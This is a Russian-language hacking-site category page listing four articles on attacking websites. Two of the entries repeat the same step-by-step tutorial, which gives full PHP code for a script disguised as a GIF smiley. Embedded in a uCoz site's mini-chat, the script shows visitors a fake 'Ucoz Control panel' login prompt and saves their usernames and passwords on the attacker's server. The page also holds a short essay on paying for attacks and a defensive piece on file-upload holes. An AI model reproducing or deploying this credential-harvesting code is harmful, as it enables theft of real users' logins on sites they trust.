Меню сайта
Категории раздела
Обычные статьи [5]
Взломы сайтов [4]
Мини-чат
Наш опрос
Сколько вам лет ?
Всего ответов: 3314
Статистика

Онлайн всего: 1
Нубов: 1
Кемперов: 0
Форма входа
Понедельник, 21-Июл-2025, 9.30.32 AM
Приветствую Вас Разведчик

Каталог статей

Главная » Статьи » Взломы сайтов

В категории материалов: 4
Показано материалов: 1-4

Сортировать по: Дате · Названию · Рейтингу · Комментариям · Просмотрам
Взлом сайта на UCOZ
Итак, начнем...
Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif). 
Затем откройте блокнот, да простой блокнот и напишите следующее:


header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
 $login = $_SERVER['PHP_AUTH_USER'];
 $pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
 {
  Header('HTTP/1.1 401 Unauthorized');
  Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
 }
 elseif($login)
 {
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
 }
}
imagegif($image);
imagedestroy($image);
?>


Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:

[IMG]http://mysite.phphost.net/smile.gif[/IMG]

И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.

Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандрартно созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем спасибо за просмотр, надеюсь статья вам поможет =)))
Взломы сайтов | Просмотров: 4284 | Добавил: DjPxOeNiX | Дата: 19-Дек-2011 | Комментарии (7)

Зная мои былые "шалости”, люди иногда предлагают мне повторить некоторые трюки за деньги. Вчера я в очередной раз услышал конкретный вопрос: "Сколько будет стоить взлом сайта … ?

Вот что я хочу сказать по этму поводу: а сможете ли вы ответить на простой вопрос "Зачем?

Зачем вам атаковать сайты конкурентов? Подумайте об этом прежде чем платить за это деньги!

Устроить DDoS и удерживать сайт в перегруженном состоянии несколько дней – пока не отфильтруют. Да, сайт прекратит работу на несколько часов. Но очень может получиться, что этим вы устроите ему рекламу – сколько раз уже такое было. Более того, себя вы прославите не как хакеров, а как DDoS-еров, лишённых всякой сообразительности – это, пожалуй, самый тупой метод атаки.

Поискать XSS-уязвимости, возможности SQL-инъекций, другие методы скриптовых атак – да, красиво. Можно взять сайт под контроль (если повезёт) и стереть его или изменить – пока не придёт владелец и не зальёт бэкап. Это несколько часов в лучшем случае, потом ошибки исправят, сайт получит свою бесплатную рекламу, а вы – головную боль (вдруг найдут).

Взломы сайтов | Просмотров: 46532 | Добавил: DjPxOeNiX | Дата: 07-Фев-2010 | Комментарии (1)

Виды взломов сайтов и их предотвращение

Данная статья не представляет собой всеобъемлющего руководства по программированию безопасных сайтов, она описывает основные принципы безопасности, о которых следует знать при программировании сайтов, и предполагает наличие у читателя базовых навыков веб-программирования и поиска информации в сети. Статья посвящена обзору основных путей взлома веб-сайтов с рекомендациями по защите от них. Упор делается на применение платформы PHP+MySQL, но основные принципы должны быть применимы и для других платформ.

Одним из ключевых принципов безопасности сайта является то, что любым данным, пришедшим извне, доверять нельзя. Даже если данные предварительно проходят проверку с помощью JavaScript в браузере пользователя (и не присылаются в случае его отключения). Даже если это название (User-Agent) браузера пользователя. Даже если это cookie, выставленные нашим же сайтом ранее. Все, что приходит извне, можно подделать. К примеру, один из распространенных форумных движков некогда взламывался из-за того, что злоумышленник посылал запрос с подделанным cookie, вызывая этим SQL-инъекцию (см. далее).

Крайне рекомендуется по прочтении статьи поискать в интернете дополнительную, возможно, новую, информацию по упоминающимся здесь конкретным направлениям взлома.

Загрузка файлов

Сайт может позволять посетителям загружать свои файлы с последующим отображением на своих страницах. Это могут быть, к примеру, изображения в формате JPEG. Важно ограничить типы загружаемых файлов, чтобы вместо картинки не был бы загружен исполняемый файл.

При загрузке файла PHP в переменной $_FILES['userfile']['type'] возвращает mime-тип файла, для JPEG-изображения это будет image/jpeg. Может показаться, что проверка этого типа достаточна для уверенности в том, что загружено именно изображение. Также встречается идея пытаться читать файл изображения функциями getimagesize или imаgecreatefromjpeg. Однако тип файла здесь определяется на основе содержания, так что правильное JPEG-изображение, сохраненное с расширением .php, будет определено как image/jpeg. А называться будет xxxxx.php. Веб-сервер же, принимающий решение об обработчике (handler) для того или иного файла, смотрит именно на расширение. Злоумышленник берет корректную картинку, приписывает к ней в конец (или в EXIF-данные) php-скрипт, и сервер его исполняет, мы взломаны.

Таким образом, контролировать для обеспечения безопасности следует именно расширение файла, а проверки через определение mime-type и через попытку открыть файл функцией getimagesize имеют смысл только для контроля того, что вместо картинки не будет загружен мусор, безвредный, но картинкой не являющийся.

Взломы сайтов | Просмотров: 44154 | Добавил: DjPxOeNiX | Дата: 07-Фев-2010 | Комментарии (4)

Взлом сайта на UCOZ

Привет. Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий хакер может найти достаточно много уязвимостей на таких сайтах и знает много способов их взлома. Я надеюсь что скоро тоже буду таким=).

Итак, начнем...
Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif).
Затем откройте блокнот, да простой блокнот и напишите следующее:


header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
 $login = $_SERVER['PHP_AUTH_USER'];
 $pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
 {
  Header('HTTP/1.1 401 Unauthorized');
  Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
 }
 elseif($login)
 {
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
 }
}
imagegif($image);
imagedestroy($image);
?>


Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:

[IMG]http://mysite.phphost.net/smile.gif[/IMG]

И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.

Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандрартно созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем спасибо за просмотр, надеюсь статья вам поможет =)))


Особое спасибо нашему порталу hackzone.ru за то, что он такой хороший ))). А также всем участникам хакзоны которые мне помогали во всем, советовали мне нужные вещи и помогают по сей день.

При копировании материалов ссылка на css-mir.ucoz.ru обязательна

Взломы сайтов | Просмотров: 13227 | Добавил: DjPxOeNiX | Дата: 07-Фев-2010 | Комментарии (2)

Поиск
Друзья сайта
  • Официальный блог
  • Сообщество uCoz
  • FAQ по системе
  • Инструкции для uCoz